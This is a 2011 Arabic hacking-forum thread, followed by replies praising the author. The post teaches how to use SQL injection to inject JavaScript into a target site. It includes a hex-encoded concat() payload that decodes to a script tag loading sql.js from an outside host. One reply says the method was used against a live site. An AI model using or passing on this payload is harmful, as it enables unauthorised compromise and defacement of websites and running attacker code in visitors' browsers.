:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   Priv8 ~ SQL injection with javascript (http://www.vbspiders.com/vb/t48292.html)

KaLa$nikoV 05-28-2011 12:06 AM

Priv8 ~ SQL injection with javascript
 
1 مرفق
Priv8 ~ SQL injection with JaVaScript

بسم الله الرحمن الرحيم

راح نستفيد بهاد الدرس من مبدا تشغيل ال جافا سكربت بثغرات sql
بنضع بالعمود المصاب كود جافا سكربت لو اشتغل ببقى شغال عنا الجافا بالعمود هاد
وغالبا يكون شغال الا اذا الحقن من نوع txt


(الي ناسي هاد الكلام يراجع للدوره)

الان عنا سكربت من الاخر اشي فاخر (بالمرفقات للاصدار الاول والاخير )

بلزم ترفعه ع موقع عشان تلعب لعبتك انا بالشرح رفعته هنا

اقتباس:

<script src="link"></script>
وبعد شفرته من هذا الموقع

كود PHP:

http://www.string-functions.com/string-hex.aspx 

وثم تم التشفير وهذا هو .......

كود PHP:

concat((0x3c736372697074207372633d27687474703a2f2f7777772e656d6d616e75656c6269626c6563686170656c2e6f72672f73716c2e6a73273e3c2f7363726970743e))volcano 


والان رابط الشرح

http://www.youtube.com/watch?v=my30hsodW5Q

طبعا الشرح والتولز برايفت ياريت الي بنقلها يذكر الحقوق (اول مره تشرح للعرب )
وهي مصدر الي لطشناه منها من الاجانب عشان ما حد يقول بخلنا عليكم بشيء
http://ponymagic.diosdelared.com/

وشكرا

موفقين

Cyber Code 05-28-2011 12:10 AM

Woow
ماشاء الله
جـزاك الله ألـف خـير , جاري المشاهده

++ تقــيم ++

bleu moon 05-28-2011 12:38 AM

waw :D thx men you are the pro

bleu moon 05-28-2011 12:38 AM

+++++

mido868 05-28-2011 12:40 AM

طريقة ممتازة جدا وخاصة للمبتدأين تقبل تحياتى

Al!Y4N3 05-28-2011 02:17 AM

حبيبي لك مني احلى هدية
حبيت المنتدي عشان يا قلب
لك احلى تقييم

ReD-HaT 05-28-2011 02:21 AM

دائما ما انتظر مواضيع من طرفك
الله يرحم من رباك
مبدع
تحياتي لك



xman2 05-28-2011 02:29 AM

البقــاء للأقوي ـ وان تطورنا فتطورنا يختلف عن الأخرين بكل معني

فولكانو فور ايفر ، حصرياتك ما نستغني عنها

يعطيك مليون عافية

سي يو مان

JetLi 05-28-2011 09:21 PM

مشكور اخي بركانو ، تمت الاستفادة من الدرس ودعس الموقع ولكن للاسف بعض المواقع لا تطبق الثغرة فيها

loai99 05-28-2011 09:34 PM

مشكوررررررررر

MazMaz 05-28-2011 10:53 PM

Volc4no yr the best :D

عيناوي العين 05-28-2011 11:55 PM

وحش ياخوي

واصل ...

M!M0 06-03-2011 02:23 AM

مشكووور يا معلم

SpookWeb 07-06-2011 02:16 PM

مشكور على الدرس ال راائع وشكر خاص ل نورالدين على الإشارة إليه

aircrack -ng 07-06-2011 08:41 PM

تشتغل من وراي :no:
يعطيك الف عافية مبدع كالعادة:wijnk:


الساعة الآن 01:08 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0